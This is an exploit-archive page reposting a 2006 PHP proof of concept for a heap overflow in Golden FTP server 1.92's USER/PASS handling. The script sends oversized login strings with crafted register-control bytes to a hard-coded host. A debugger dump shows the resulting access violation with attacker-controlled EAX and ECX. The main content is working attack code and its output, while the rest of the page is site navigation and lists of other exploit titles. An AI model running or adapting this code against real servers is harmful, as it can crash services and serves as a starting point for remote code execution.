首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC
来源:http://retrogod.altervista.org 作者:rgod 发布时间:2006-12-12  

<?php
#23.07 03/12/2006
#Golden FTP server 1.92 (freeware edition) USER/PASS heap based overflow poc
#by rgod retrog at alice dot it
#site: http://retrogod.altervista.org

#download link: http://www.download.com/3000-2160_4-10375602.html?tag=sd.EXAF

$host="192.168.1.3";
$port="21";

$junk="";
for ($i=1; $i<=8095; $i++){
$junk.="a";
}

$eax="AAAA";
$eax[0]=chr(ord($eax)-20); //to have the wanted eax
$ecx="BBBB";

$junk.=$ecx.$eax;

$sock=@fsockopen($host,$port,$errno, $errstr, 10);
if (!$sock){
die("\nnot connected!\n");
}
else {
fgets($sock,80);
fputs($sock,"USER ".$junk."\r\n");
fgets($sock,80);
fputs($sock,"PASS ".$junk."\r\n");
fclose($sock);
}
/*
...
17:07:28.144 pid=0870 tid=1128 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00EBFD64: C4 9D A6 00 F4 BF A5 00-00 9F A6 00 BC FD EB 00
ESP=00EBFD1C: 00 00 00 00 58 FD EB 00-61 24 41 00 80 9F A6 00
EBP=00EBFD20: 58 FD EB 00 61 24 41 00-80 9F A6 00 F4 BF A5 00
ESI=004B9F04: 2D 41 41 41 00 00 00 00-00 00 00 00 00 00 00 00
EDI=004B9F00: 42 42 42 42 2D 41 41 41-00 00 00 00 00 00 00 00
EIP=004A9B74: 8B 00 8B 12 E8 5F F6 FD-FF 0F 94 C0 83 E0 01 5B
--> MOV EAX,[EAX]
----------------------------------------------------------------

17:07:28.254 pid=0870 tid=1128 Thread exited with code 0
...
*/
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mxBB Module Activity Games 0.9
·D-Link DWL-2000AP 2.11 (ARP Fl
·Fantastic News 2.1.4 (news.php
·mxBB Module newssuite 1.5 Rem
·Gizzar <= 03162002 (index.p
·Crob FTP Server 3.6.1 build 26
·J-OWAMP Web Interface <= 2.
·ProFTPD <= 1.3.0a (mod_ctrl
·F-Prot Antivirus 4.6.6 (CHM) H
·MS Internet Explorer 7 (DLL-lo
·F-Prot Antivirus 4.6.6 (ACE) D
·yaplap <= 0.6.1b (ldap.php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved